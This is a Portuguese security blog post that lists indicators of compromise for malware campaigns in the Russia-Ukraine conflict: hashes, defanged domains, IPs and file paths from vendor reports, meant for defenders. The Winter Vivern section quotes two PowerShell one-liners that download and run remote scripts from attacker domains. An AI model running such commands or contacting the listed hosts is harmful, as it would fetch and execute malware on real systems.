abril 07, 2022

[Segurança] Indicadores dos ciber ataques durante o conflito entre a Russia e Ucrânia

(Nota: Esse post foi suspenso e colocado sob revisão do Blogger sob suspeita de violação da política de comunidade do site ("Malware and Viruses policy") várias vezes. Este post é apenas uma coletânea de fatos técnicos sobre campanhas de malwares identificadoa durante o ciber conflito entre Russia e Ucrânia, incluindo seus indicadores técnicos, obtidos de fontes públicas e confiáveis, quando houver. 

ESSE POST NÃO REPRESENTA PERIGO ALGUM!
Estas informações são usadas para PROTEGER as organizações. 

Não há conteúdo malicioso sendo publicado aqui!

Note: This post was suspended and placed under review by Blogger staff, on suspicion of violating the site's community guidelines ("Malware and Viruses policy") many times. This post is just a collection of technical information and facts about the malware campaigns seen in the cyber conflict between Russia and Ukraine, including their technical indicators (IOCs), obtained from public and trustworthy sources, whenever they were available.

THIS POST OFFERS NO HARM AT ALL!
This information is to HELP organizations to PROTECT themselves.

There is no malicious content published here!)

Eu tenho acompanhado os aspectos de segurança desde o início desse triste conflito entre a Rússia e a Ucrânia, uma vez que a invasão russa foi precedida por alguns ciber ataques e acabou gerando diversas outras ações online.

Até o início de Abril, em 1 mês de conflito, já haviam sido identificados diversos malwares "wiper", um malware destinado a destruir dados e sistemas, utilizados em ciber ataques contra empresas e órgãos de governo da Ucrânia. Entre eles, alguns nomes que ficaram famosos, como o WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, DoubleZero e o AcidRain. Todo o acompanhamento, descritivo e linha do tempo com os diversos ciber ataques que ocorreram estão disponíveis nesse post: "Guerra cibernética na Ucrânia".

Para facilitar, eu preferi retirar do post original e destacar aqui a lista de indicadores de comprometimento (Indicators of compromise / IOCs) relacionados aos ciber ataques envolveram o uso de códigos maliciosos.

Segue abaixo alguns IOCs mais relevantes relacionados aos malwares envolvidos nos principais ciber ataques contra a Ucrânia:

  • WhisperGate e WhisperKill (divulgados pela MicrosoftCERT-UASecureworks e CISCO Talos)
    • No dia 13 de Janeiro foi identificada a ação de um malware "wiper", batizado de WhisperGate, que sobrescreve a Master Boot Record (MBR) do equipamento infectado e apresenta uma nota falsa de resgate, simulando um ransomware;
    • Hashs do stage1.exe (BootPatch / MBR Wiper): a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 (SHA-256)  189166d382c73c242ba45889d57980548d4ba37e (SHA-1) 5d5c99a08a7d927346ca2dafa7973fc1 (MD5)
    • Hash do stage2.exe (WhisperGate / Downloader): dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 (SHA-256) 16525cb2fd86dce842107eb1ba6174b23f188537 (SHA-1) 14c8482f302b5e81e3fa1b18a509289d (MD5)
    • Hashs do payload do Stage 3 (WhisperPack / Loader DLL):  923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 (SHA-256) b2d863fc444b99c479859ad7f012b840f896172e (SHA-1) b3370eb3c5ef6c536195b3bea0120929 (MD5)
    • Hashs da DLL do Stage 3 (WhisperPack / Loader DLL): 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d  (SHA-256) 82d29b52e35e7938e7ee610c04ea9daaf5e08e90 (SHA-1) e61518ae9454a563b8f842286bbdb87b (MD5)
    • Hash do Stage 4 (WhisperKill / File Wiper):  34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 (SHA-256) a67205dc84ec29eb71bb259b19c1a1783865c0fc (SHA-1) 3907c7fbd4148395284d8e6e3c1dba5d (MD5)
  • HermeticWiper / KillDisk.NCV (descoberto pela ESET)
    • Em 23/02, um pouco antes do início da invasão russa, foi identificado um "wiper" batizado de HermeticWiper (ou FoxBlade);
    • 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 (SHA-256)
    • 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da (SHA-256)
    • a64c3e0522fad787b95bfb6a30c3aed1b5786e69e88e023c062ec7e5cebf4d3e (SHA-256)
    • 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 (SHA-256) 
  • Cyclops Blink (NCSC/UK)
    • Hash do arquivo cpd (sample 1): 50df5734dd0c6c5983c21278f119527f9fdf6ef1d7e808a29754ebc5253e9a86 (SHA-256)
    • Hash do arquivo cpd (sample 2): c082a9117294fa4880d75a2625cf80f63c8bb159b54a7151553969541ac35862 (SHA-256)
    • Hash do arquivo install_upgrade (sample 1): 4e69bbb61329ace36fbe62f9fb6ca49c37e2e5a5293545c44d155641934e39d1 (SHA-256)
    • Hash do arquivo install_upgrade (sample 2): ff17ccd8c96059461710711fcc8372cfea5f0f9eb566ceb6ab709ea871190dc6 (SHA-256)
  • IsaacWiper / Win32/KillMBR (ESET)
    • No dia 24/02, no dia do início da invasão russa e um dia depois do ataque pelo HermeticWiper, um novo malware atacou a Ucrânia, batizado de IsaacWiper pela ESET. A empresa divulgou essa descoberta em 01 de Março;
    • Arquivos:
      • cl64.dll: AD602039C6F0237D4A997D5640E92CE5E2B3BBA3 (SHA-1)
      • cld.dll: 736A4CFAD1ED83A6A0B75B0474D5E01A3A36F950 (SHA-1)
      • clean.exe: E9B96E9B86FAD28D950CA428879168E0894D854F (SHA-1)
  • Liberator / Disbalancer.exe (CISCO Talos)
    • Em 09/03 o grupo de pesquisadores do CISCO Talos divulgou a descoberta de um malware disfarçado como um software batizado de "Liberator", promovida como uma ferramenta para realizar ataques DDoS contra alvos de propaganda da Rússia. O objetivo era infectar os "soldados cibernéticos" pró-Ucrânia, roubando dados da máquina aonde for instalado
    • IP 95[.]142.46.35 - Porta 6666
    • 33e5d605c1c13a995d4a2d7cb9dca9facda4c97c1c7b41dc349cc756bfc0bd67 (SHA-256)
    • f297c69795af08fd930a3d181ac78df14d79e30ba8b802666605dbc66dffd994 (SHA-256)
    • eca6a8e08b30d190a4956e417f1089bde8987aa4377ca40300eea99794d298d6 (SHA-256) (EXE)
    • 705380e21e1a27b7302637ae0e94ab37c906056ccbf06468e1d5ad63327123f9 (SHA-256) (ZIP)
  • CaddyWiper / Win32/KillDisk.NCX (ESET)
    • No dia 14/03 a ESET noticiou a existência de um novo malware wiper atacando as redes das empresas da Ucrânia. Batizado de CaddyWiper, ele infecta servidores Windows;
    • 98b3fb74b3e8b3f9b05a82473551c5a77b576d54 (caddy.exe)
  • DoubleZero (CISCO Talos e CERT-UA)
    • A partir do dia 17/03 as organizações ucranianas começaram a ser atacadas por mais um malware wiper distribuído através de ataques de spear-phishing, batizado de DoubleZero - conforme informado pelo CERT da Ucrânia em 23/03;
    • d897f07ae6f42de8f35e2b05f5ef5733d7ec599d5e786d3225e66ca605a48f53 (SHA-256) 36dc2a5bab2665c88ce407d270954d04 (MD5)
    • arquivo "csrss.zip": 8dd8b9bd94de1e72f0c400c5f32dcefc114cc0a5bf14b74ba6edc19fd4aeb2a5 (SHA-256) 989c5de8ce5ca07cc2903098031c7134 (MD5)
    • arquivo "cpcrs.exe": 3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe (SHA-256) 7d20fa01a703afa8907e50417d27b0a4 (MD5)
    • arquivo "csrss.exe": 30b3cbe8817ed75d8221059e4be35d5624bd6b5dc921d4991a7adc4c3eb5de4a (SHA-256) b4f0ca61ab0c55a542f32bd4e66a7dc2 (MD5)
  • AcidRain (Sentinelone)
    • Em 24/02 um malware wiper batizado de AcidRain foi utilizado para desativar os modens utilizados pela rede de acesso internet via satélites KA-SAT da empresa Viasat;
    • 9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a (SHA256)
    • 86906b140b019fdedaaba73948d0c8f96a6b1b42 (SHA1)
    • ecbe1b1e30a1f4bffaf1d374014c877f (MD5)
  • PseudoSteel (CERT-UA)
    • Em. 28/03 o CERT da Ucrânia alertou sobre a distribuição de mensagem com o malware PseudoSteel, disfarçado de um arquivo com nome ""Information on the loss of servicemen of the Armed Forces of Ukraine.docx.exe."" (em ucraniano). O vírus rouba arquivos locais e os envia para um servidor FTP externo;
    • Arquivos:
      • "Інформація_щодо_втрат_військовослужбовців_ЗС_України.docx.exe": eda76ae28628c64d9e12a86adef6dc69  (MD5) 13eaa638d071e7dc124cf982b8777c6ef50a3d9dc8c57d22d23abe1bae5560f5 (SHA-256)
      • "googleupdate.exe": 878c30bdefb1b76ea10823a6d5a32f89 (MD5) bab351b5f19ecaa24eaa438dd93decd5587e0b441fc43b78893ca2e207b2cb2f (SHA-256)
      • "googleupdate.deupx.exe": 55cafceba527c3e68852b1af071929c0 78b492e211e91b1ef9a4bcd5ba80c9572545d5f3f63d3071e3253dcec3a5d97c 
      • "Втрати-1001.docx": 5d29da2285390164a0a7d80e6ed23da7 (MD5) c50972c11ffd1da9e0ed670b99296f75ec52933699790285d050c0654c21fda3 (SHA-256)
  • GoMet (Cisco Talos)
    • arquivos: 
      • "FctSec.exe": f24158c5132943fbdeee4de4cedd063541916175434f82047b6576f86897b1cb (SHA-256)
      • "SQLocalM86.exe": 950ba2cc9b1dfaadf6919e05c854c2eaabbacb769b2ff684de11c3094a03ee88 (SHA-256)
    • IP 111.90.139.122
  • GRIMPLANT e GRAPHSTEEL (Mandiant)
    • anexo ao e-mail de phishing (arquivo "Заборгованість по зарплаті.xls"): da305627acf63792acb02afaf83d94d1 (MD5)
    • arquivo "Base-Update.exe": 06124da5b4d6ef31dbfd7a6094fc52a6 (MD5)
    • arquivo "java-sdk.exe" (downloader): 36ff9ec87c458d6d76b2afbd5120dfae (MD5)
    • arquivo "oracle-java.exe" (GRIMPLANT backdoor): 4a5de4784a6005aa8a19fb0889f1947a (MD5)
    • arquivo "microsoft-cortana.exe" (GRAPHSTEEL infostealer): 6b413beb61e46241481f556bb5cdb69c (MD5)
  • SEABORGIUM (Microsoft)
    • cache-dns[.]com
    • cache-dns-forwarding[.]com
    • cache-dns-preview[.]com
    • cache-docs[.]com
    • cache-pdf[.]com
    • cache-pdf[.]online
    • cache-services[.]live
    • cloud-docs[.]com
    • cloud-drive[.]live
    • cloud-storage[.]live
    • docs-cache[.]com
    • docs-forwarding[.]online
    • docs-info[.]com
    • docs-shared[.]com
    • docs-shared[.]online
    • docs-view[.]online
    • document-forwarding[.]com
    • document-online[.]live
    • document-preview[.]com
    • documents-cloud[.]com
    • documents-cloud[.]online
    • documents-forwarding[.]com
    • document-share[.]live
    • documents-online[.]live
    • documents-pdf[.]online
    • documents-preview[.]com
    • documents-view[.]live
    • document-view[.]live
    • drive-docs[.]com
    • drive-share[.]live
    • goo-link[.]online
    • hypertextteches[.]com
    • mail-docs[.]online
    • officeonline365[.]live
    • online365-office[.]com
    • online-document[.]live
    • online-storage[.]live
    • pdf-cache[.]com
    • pdf-cache[.]online
    • pdf-docs[.]online
    • pdf-forwarding[.]online
    • protection-checklinks[.]xyz
    • protection-link[.]online
    • protectionmail[.]online
    • protection-office[.]live
    • protect-link[.]online
    • proton-docs[.]com
    • proton-reader[.]com
    • proton-viewer[.]com
    • relogin-dashboard[.]online
    • safe-connection[.]online
    • safelinks-protect[.]live
    • secureoffice[.]live
    • webresources[.]live
    • word-yand[.]live
    • yandx-online[.]cloud
    • y-ml[.]co
  • Dark Crystal RAT (DCRat) (Fortinet e CERT-UA)
    • arquivos: 
      • 03700E0D02A6A1D76ECAA4D8307E40F76E07284646B3C45693054996F2E643D7
      • 24811E849A7A0E73788BC893BED81B88405883EB9114557EACD26A90C2A81C29
      • C84BBFCE14FDC65C6E738CE1196D40066C87E58F443E23266D3B9E542B8A583E
    • Sites e IPs:
      • 72[.]167.223.219/MSDriverLoader.exe
      • 203[.]96.191.70/MSDriverMonitor.exe
      • star-cz.ddns[.]net
      • 103[.]27.202.127
  • Gamaredon (CISCO Talos Intelligence)
    • arquivo malicioso: 4aa2c783ae3d2d58f12d5e89282069533a80a7ba6f7fe6c548c6230a9601e650
    • arquivos LNK:
      • 581ed090237b314a9f5cd65076cd876c229e1d51328a24effd9c8d812eaebe6a
      • 34bf1a232870df28809597d49a70d9b549d776e1e4beb3308ff6d169a59ecd02
      • 78c6b489ac6cebf846aab3687bbe64801fdf924f36f312802c6bb815ed6400ba
      • 1cb2d299508739ae85d655efd6470c7402327d799eb4b69974e2efdb9226e447
      • a9916af0476243e6e0dbef9c45b955959772c4d18b7d1df583623e06414e53b7
      • 8294815c2342ff11739aff5a55c993f5dd23c6c7caff2ee770e69e88a7c4cb6a
      • be79d470c081975528c0736a0aa10214e10e182c8948bc4526138846512f19e7
      • 5264e8a8571fe0ef689933b8bc2ebe46b985c9263b24ea34e306d54358380cbb
      • ff7e8580ce6df5d5f5a2448b4646690a6f6d66b1db37f887b451665f4115d1a2
      • 1ec69271abd8ebd1a42ac1c2fa5cdd9373ff936dc73f246e7f77435c8fa0f84c
    • arquivo RAR: 750bcec54a2e51f3409c83e2100dfb23d30391e20e1c8051c2bc695914c413e3 
    • arquivo INFOSTEALER: 139547707f38622c67c8ce2c026bf32052edd4d344f03a0b37895b5de016641a
    • URLs maliciosas:
      • hxxp://a0698649.xsph[.]ru/barley/barley.xml
      • hxxp://a0700343.xsph[.]ru/new/preach.xml
      • hxxp://a0700462.xsph[.]ru/grow/guests.xml
      • hxxp://a0700462.xsph[.]ru/seek/lost.xml
      • hxxp://a0701919.xsph[.]ru/head/selling.xml
      • hxxp://a0701919.xsph[.]ru/predator/decimal.xml
      • hxxp://a0701919.xsph[.]ru/registry/prediction.xml
      • hxxp://a0704093.xsph[.]ru/basement/insufficient.xml
      • hxxp://a0704093.xsph[.]ru/bass/grudge.xml
      • hxxp://a0705076.xsph[.]ru/ramzeses1.html
      • hxxp://a0705076.xsph[.]ru/regiment.txt
      • hxxp://a0705269.xsph[.]ru/bars/dearest.txt
      • hxxp://a0705269.xsph[.]ru/instruct/deaf.txt
      • hxxp://a0705269.xsph[.]ru/prok/gur.html
      • hxxp://a0705581.xsph[.]ru/guinea/preservation.txt
      • hxxp://a0705880.xsph[.]ru/band/sentiment.txt
      • hxxp://a0705880.xsph[.]ru/based/pre.txt
      • hxxp://a0705880.xsph[.]ru/selection/seedling.txt
      • hxxp://a0706248.xsph[.]ru/reject/headlong.txt
      • hxxp://a0707763.xsph[.]ru/decipher/prayer.txt
    • Drop sites:
      • hxxp://155.138.252[.]221/get.php
      • hxxp://45.77.237[.]252/get.php
      • hxxp://motoristo[.]ru/get.php 
      • hxxp://heato[.]ru/index.php
      • hxxps://<random_string>.celticso[.]ru
      • IP 162[.]33.178.129 
      • kuckuduk[.]ru
      • pasamart[.]ru
      • celticso[.]ru
  • Prestige (Microsoft)
    • Ransomware payload: 5dd1ca0d471dee41eb3ea0b6ea117810f228354fc3b7b47400a812573d40d91d (SHA-256)
    • Ransomware payload: 5fc44c7342b84f50f24758e39c8848b2f0991e8817ef5465844f5f2ff6085a57 (SHA-256)
    • Ransomware payload: 6cff0bbd62efe99f381e5cc0c4182b0fb7a9a34e4be9ce68ee6b0d0ea3eee39c (SHA-256)
    • PE Import Hash: a32bbc5df4195de63ea06feb46cd6b55
    • File path of the ransom note: C:\Users\Public\README

  • CryWiper (Kaspersky) (em russo)
    • c:\windows\system32\browserupdate.exe (Trojan-Ransom.Win64.CryWiper.a): 14808919a8c40ccada6fb056b7fd7373
    • C&C: hxxp://82[.]221.141.8/IYJHNkmy3XNZ
  • "Trojanized Windows 10 Installer" (Mandiant)
    • ISO “Win10_21H2_Ukrainian_x64.iso”: b7a0cd867ae0cbaf0f3f874b26d3f4a4 (MD5)
    • Download site: hxxps://toloka[.]to/t657016#1873175
    • Download site (Russian torrent tracker): hxxps://rutracker[.]net/forum/viewtopic.php?t=6271208
    • BEACON C2s:
      • hxxps://cdnworld[.]org/34192–general-feedback/suggestions/35703616-cdn– 
      • hxxps://cdnworld[.]org/34702–general/sync/42823419-cdn
    • STOWAWAY C2s:
      • 193.142.30[.]166:443
      • 91.205.230[.]66:8443
  • Cloud Atlas (Checkpoint)
    • Domínios:
      • desktoppreview[.]com
      • gettemplate[.]org
      • driversolution[.]net
      • translate-news[.]net
      • technology-requests[.]net
      • protocol-list[.]com 
      • comparelicense[.]com
      • support-app[.]net
      • remote-convert[.]com
    • IPs: 146.70.88[.]123 e 185.227.82[.]21
    • Documents, scripts and payloads (MD5):
      • a34d585f66fc4582ed709298d00339a9
      • b1aad1ed2925c47f848f9c86a4f35256 
      • f58ad9ee5d052cb9532830f59ecb5b84
      • 57c44757d7a43d3bc9e64ec5c5e5515d 
      • 41d2627522794e9ec227d72f842edaf7
      • f95ceca752d219dbc251cca4cd723eae 
      • 044e167af277ca0d809ce4289121a7b5
      • 1139c39dda645f4c7b06b662083a0b9d 
      • 3399deafaa6b91e8c19d767935ae0908
      • bd9907dd708608bd82bf445f8c9c06ab 
      • edc96c980bbc85d83dcd4dca49ca613f
      • ee671a205b0204fa1a6b4e31c9539771 
      • 5488781d71b447431a025bd21b098c2c
      • 16fbbafa294d1f4c6c043d89138d1b60 
      • 5bbc3730c943b89673453176979d6811
      • b684f3ee5a316e7fbcfa95ebcf86dedc 
      • ae74f2bfd671e11828a1ae040fe6d48c
      • 2a21265df0bdd70a96551d9d6104b352 
      • a8a93fa8ef221de5ee3d110cfc85243d
      • eb527d1682bfbed5d9346e721c38c6f5 
      • ae828e3c03cc1aaedc43bb391e8b47ed
      • c7a1dd829b03b47c6038afa870b2f965 
      • c2064c7f4826c46bc609c472597366fd
      • 89d40dd2db9c2cfd6a03b20b307dcdec 
      • d236d8fda2b7d6fd49b728d57c92a0a9
      • 9b05080490d51a7d2806a0d55d75c7ff 
      • d5a40e2986efd4a182bf564084533763
      • 077b71298ce31832ae43e834b7e6c080 
      • f68e64dacd046289d4222098ee421478
      • d236d8fda2b7d6fd49b728d57c92a0a9 
      • 81932933422d4bc4ece37472f9eb3ddc
      • d0d728856a91710df364576e05f2113e 
      • 94283807d0c97b3adb8f4ab45fffb5bc
      • 0e9147b824bc1d2507984ccd2a36d507 
      • dc3faa6840d1b5fd296d71ee8877254e
      • aa04bfcc675c73be1238fa953e19c4cf 
      • 789afbe3a173d13d0b3700da6a629e15
      • acbbc6fea0dbbe7cba511b450cc2b758 
      • e79833c9f758775ba0d82b8f4c8d2981
      • 3609ca3013d29fb824805b9a996eff70 
      • 956f2241e81345d6507d0cd43499dba1
      • a3ba37cde2644ed6345d2c74ce25bfd8 
      • a7a004e7118c986f1e07c87ce52a60e5
      • b7b71b35fbfd119319015b04de817b3c 
      • f29cbc7639b53003fb33d8b20b9c0b59
  • ANDROMEDA (Mandiant)
    • ANDROMEDA TrustedInstaller.exe: bc76bd7b332aa8f6aedbb8e11b7ba9b6
    • ANDROMEDA mskmde.com: b3657bcfe8240bc0985093a0f8682703
    • KOPILUWAK WinRAR SFX: 2eb6df8795f513c324746646b594c019
    • KOPILUWAK xpexplore.js: d8233448a3400c5677708a8500e3b2a0
    • QUIETCANARY 00c3df3b.exe: 403876977dfb4ab2e2c15ad4b29423ff
    • QUIETCANARY file.exe16: 8954caa2017950e0f6269d6f6168b796
    • UNC4210 ANDROMEDA C2
      • suckmycocklameavindustry[.]in 
      • yelprope.cloudns[.]cl 
      • anam0rph[.]su 
      • 212.114.52[.]24
    • UNC4210 KOPILUWAK C2: manager.surro[.]am
    • QUIETCANARY C2: 194.67.209[.]186:443


  • RansomBoggs (ESET)
    • F4D1C047923B9D10031BB709AABF1A250AB0AAA2
    • 021308C361C8DE7C38EF135BC3B53439EB4DA0B4
  • DolphinCape (CERT-UA)
    • Arquivos:
      • shahed-136.rar:
        • 247997c2b4431585f9355d3324410298
        • 460244cbf353b15b52c69952dd3b2549d
        • e79c590c56807bc25d4896dd0016655
      • shahed.ppsx
        • 241e4285a84be65cf16778462f06b9a8
        • 5137a888271b08f388d863433e5f0f1b1
        • 29e15d4c812b95c831e93e27ec45bd6 
      • SearchEmbdIndex.ps1 
        • 3444e86aefa7bc2dbce34903f805400d
        • 6ee62645cd97fb0b41fdf219b9a2a8211
        • 324ded110b5c7f09b3d9881abb2a594
      • CodeMeter.exe
        • 142893c48b76b7e9d0f7ce74e16aaf1f
        • 2c1a2fe3fb418601f3adc9256e1ff2c50
        • 9178483fdbb0e964f52fb6b30be1129
      • WibuCm32.dll (2022-09-24 06:09:32) (DolphinCape)
        • 98c3d5347842743bfb4ade50b39226c1
        • 772654b186ad9fbd0a80f03ceae7d327b
        • 45c8944452cc39048160b1f6d8f2672
    • Redes:
      • morgunov.a@dsns.com.ua
      • 195[.]123.237.147
      • 202[.]157.187.190
      • dsns.com[.]ua
      • hXXp://195[.]123.237.147/manifests/win/WIBU/Manifest?r=rev1&role=
      • hXXp://202[.]157.187.190/cgi-bin/rarcheckcert[.]cgi/http/20221208011644645.stc
    • Hosts:
      • %LOCALAPPDATA%\Microsoft\msWIBU\ 
      • %LOCALAPPDATA%\Microsoft\msWIBU\CodeMeter.dat 
      • %LOCALAPPDATA%\Microsoft\msWIBU\CodeMeter.exe 
      • %LOCALAPPDATA%\Microsoft\msWIBU\WibuCm32.dll 
      • %TMP%\mso\SearchEmbdIndex.ps1
      • SidebarWIBU- (part of the name of the scheduled task)
      • msoSearchEngineUA- (part of the name of the scheduled task)
  • Graphiron (Symantec)
    • Downloader.Graphiron: 0d0a675516f1ff9247f74df31e90f06b0fea160953e5e3bada5d1c8304cfbe63 (SHA-256)
    • Downloader.Graphiron: 878450da2e44f5c89ce1af91479b9a9491fe45211fee312354dfe69e967622db (SHA-256)
    • Infostealer.Graphiron: 80e6a9079deffd6837363709f230f6ab3b2fe80af5ad30e46f6470a0c73e75a7 (SHA-256)
    • Infostealer.Graphiron: eee1d29a425231d981efbc25b6d87fdb9ca9c0e4e3eb393472d5967f7649a1e6 (SHA-256)
    • Infostealer.Graphiron: f0fd55b743a2e8f995820884e6e684f1150e7a6369712afe9edb57ffd09ad4c1 (SHA-256)
    • Infostealer.Graphiron: f86db0c0880bb81dbfe5ea0b087c2d17fab7b8eefb6841d15916ae9442dd0cce (SHA-256)
    • Network: 208.67.104[.]95 — C&C server
  • Winter Vivern (CERT-UA)
    • Arquivos:
      • Забезпечення кібербезпеки.html: 93beb3454664314826a843ae28befe96 - b10bc0bb30b3c1d0c404d3a902ccebc425f23cb5a66c02104739f226c77b5816 
      • Protector.bat: 42b6b2533135574ac8a2027df465b295 - 05457a790782542d3f16c9b8368a077b458ff7349856e6da541223a51e94b9c8
      • fjasmngptwq95824s.php: 4d6eac0b0dd1adc47d81b163d03e5f4b - 91e9325dd4972c0d40becfff6e65399c46aeb210a3b9a1f75d453cc8fe87d09c
      • LG5362s5215098-xvbxzcnsaf4lmsa.php: a03cb9a28fa5ce72354e1556731a68d4 - cf919033a2a4f76a4b78499be027090a0a7980a2f536df53eebb2140478abeb7
      • fx64g15g.xml: 4d549fa15eadeefd30f5269a2b3995c4 - 521c8345351144437033b41dfb5e4878c3b3a7ade4e2d0ccdcc5699d0b4d3ac6
      • 9f5fe4bab163de5eedb995beed21c75578284fa4.php: 7ffb80d87ab0fe5e2c7f7338ec22a7b0 - 3442724f36fcaa1822bdafc3417e6bc7488898c4acbc73f0114ffeb6a3604164
      • 62d4677fcf600ac0c4933bd80dec255868827e00.php: ed7bb4cc6dd1079efbe4bc3ceffd4250 - d8236c841b07c933d4de0ef9ed854902f6aae73b83137d9ffbe29fb879aa094f
      • 62d4677fcf600ac0c4933bd80dec255868827e00.dec.ps1: 9997462826c26ab82a29e1c0712bbbb5 - 2708b9f8a196c50c8c6d6001af5b02e3c5d113e1977a686319eae7652ecbc1d3
      • Protector.bat: 6fe2a60e3f4c15c60128562d006696b6 -     72028cff34d33e26bf01e4bf63c8b977ece33b3809bd6dd075bcff343895dc4b   
    • Host-based:
      • %APPDATA%\XmlSchemaMicrosoftXsd.xml 
      • %APPDATA%\XmlSchemaMicrosoftXsdO.xml
      • %PUBLIC%\MicrosoftUpdateClient\ 
      • %PUBLIC%\MicrosoftUpdateClient\Microsoft_update_tool_%NUM%.dat
      • powershell.exe -c "Start-Process -win hidden -filepath 'powershell.exe' -argumentlist ""`$a=whoami;"",""[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};iex (New-Object Net.WebClient).DownloadString('hXXps://bugiplaysec[.]com/fjasmngptwq214.php')"""
      • powershell.exe -c "Start-Process -win hidden -filepath 'powershell.exe' -argumentlist ""`$a=whoami;"",""[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};iex (New-Object Net.WebClient).DownloadString('hXXps://troadsecow[.]com/fjasmngptwq95824s.php')""" Client_Update_Microsofts-{ITCUNTH-9D12-4RE1-8BWD-6HFI2D4FNI1I2}
    • Network-based:
      • hXXps://bugiplaysec[.]com/ssu.gov.ua/
      • hXXps://ocspdep[.]com/ssu.gov.ua/
      • hXXp://troadsecow[.]com/policja.gov.pl 
      • hXXps://troadsecow[.]com/cbzc.policja.gov.pl
      • hXXps://troadsecow[.]com/mfa.gov.ua/ 
      • hXXps://troadsecow[.]com/mfa.gov.ua/downloadapp.php
      • hXXps://troadsecow[.]com/ 
      • hXXps://troadsecow[.]com/76bja21412/c6bd801d882333fdb93dd17308b3e2de3a78cc05_.php 
      • hXXps://troadsecow[.]com/76bja21412/c6bd801d882333fdb93dd17308b3e2de3a78cc05_1.php hXXps://bugiplaysec[.]com/fjasmngptwq214.php 
      • hXXps://troadsecow[.]com/fjasmngptwq95824s.php 
      • hXXps://troadsecow[.]com/gkaslnwqpasg/fx64g15g.xml 
      • hXXps://troadsecow[.]com/gkaslnwqpasg/usersfolders/%SID%/59948e7126a2927a53af0593f85dad2f5ae5c6e0.php 
      • hXXps://troadsecow[.]com/gkaslnwqpasg/usersfolders/%SID%/62d4677fcf600ac0c4933bd80dec255868827e00.php 
      • hXXps://troadsecow[.]com/gkaslnwqpasg/usersfolders/%SID%/9f5fe4bab163de5eedb995beed21c75578284fa4.php
      • hXXps://troadsecow[.]com/lg5362s5215098-xvbxzcnsaf4lmsa.php 
      • hXXps://troadsecow[.]com/lg5362s5215098-xvbxzcnsaf4lmsa.php?idu=%SID%
      • ocspdep[.]com
      • troadsecow[.]com
      • bugiplaysec[.]com
      • 176[.]97.66.57 AE @iroko.net
      • 195[.]54.170.26 NO @iroko.net
      • 45[.]136.198.141 BG @iroko.net
      • 80[.]79.119.239 GB @wavecom.ee (@3nt.com)
  • GammaLoad, GammaSteel (CERT-UA - veja o alerta para mais IOCs)
    • Arquivos:
      •  Порядок денний на 04.08.2022.docx: 136bd98383e5b3e06b63f2d7c72a3d4d - 81d8c20a19e1c2c3e5bfd6f8a39499321f42b07f6b94c9e0bb98fd6cfd4355a8
      • Порядок денний на 04.08.2022.docx: 82e0e0838c6c8abf103d4e5dab78b703 -f2f6077597d1fdb84bbb35aebd169af522767bc3a6aae58e778c429626f376a3
      • faithfully.nab: 1bba824db40a7ce52313ed76b55ac5fd - f628fa53fc3f91c1d812246291b3a188904ab091c735e8dc7ed644103a0eb5c6 
      • Normal.dotm: 897c859e25576146f4e03329f076bd40 - 2cb17eb3450b4cfad148427986410cda69d47a124a7dea43c577a55569ff3761 
      • Wikipedia Search Tools: 9da690670ff22a610f632251538888c4 - 2dfef7c52c05c3b88818edd7764ef1f1d41c1450918441e6a5d8b1518b80ac3e
      • autowake: db5606f0010bb7fdc1e10174055b0f93 - 968f841df2fd5b7458d15569b756088691e6d4a04e5f6f22df1c773e1fe35129
      • MsCtfMonitor: a73326f0373131fdd4814b9fc67c7e34 -c82728665fafb66828f3fe2d9ee28b2e670e958abc1f5dda6c5e460db2502207
      • ScheduledDefrag: 7d200a3eb82b9b3c60daa0866f9b6db9 - 6cccc179db19c405cc313f60d3bb09e00f7b273ec3c6ddf03ae4cba3fcac961d
      • winsparcontrols: 904803767f7d3c8f2f947f40f8ba6272 -afcb200cf4a646397f67c37d396cd5573db2575ae945b3251dfb6d285d1e6724
      • regidlebackup: 9db94f4c9dba8adb2c13f1962c1fcaa6 -f1f4ed4122564c90b473617d9989a2a90af1d93c4b75c8cfecd564ff71f803a0
      • КОРЗИНА.LNK: 7f0270c87e1d14d95c51cd303dbab195 - bcb63de0b16c449b054982ad1d4c23810a396e061ae45801df4d64acf4e82674
      • НЕ СМОТРЕТЬ.LNk: 6c6fbdd3dcf6919d6d2aff8065892b2c - 1b59868b460359f46c6ae0a01b6f34c89a33b79992a03573fc40bd3c501cbea4
      • ПОРНО.lNK: 66d7796b61ddac70f748cbc1ff26dfef -  00fe49d9fde36aace2e9c35962ac11f8595b8452d84ba02f4511754ced831d66
      • НА ДОКЛАД.lNK: 949d29f97c11abeab41075bf2a6e9dfd - 6f2004a5b3f4f1c84c0e0e08181cfb8bbc0f50617e58d57cecddf4789587880a
      • МОИ ФОТО.LNk: 94031409d9f552e174dcc66e2b3bd45b - 564aba6e5366347b1e522b2af7a46fa54e6d23af4ce17b2dd3a5d45d925c7aa4
      • РАЗОБРАТЬ.lnk: 54cfc650263a61a5c372dd8b4fa6e9e5 - 788dc18de55d73027011a0b109b4b795e6ae485bdda7dd07deecab6af386170c
      • ФОТО.lnk: b8686b1038a1f4c162c1f0454169fec8 -  7d2c607bb9627e14d572356ff653b587ea0d7f7b2c1f4ab45bb979b81f9369ae
      • ХЛАМ.lNK: a34a506a965669daf00075c5a22f7187 -  24fe5b916433ae295685dddcc5c808fb4cd3d3a2c3d999b721f4e650773b1ed4
      • index.txt: f046e20e2429a47194cf7cb76db1dfd2 - c19dbecf59908f530a63705af62a3596531f7eecbb971a2926670fb4c0697a2c
      • index.php: e45eeb97da3155179fb1c626ae930eda - 79c340f1d8c78b96d4e92a78d9c407494769df79ab491dfe2b1955f26af4e388 
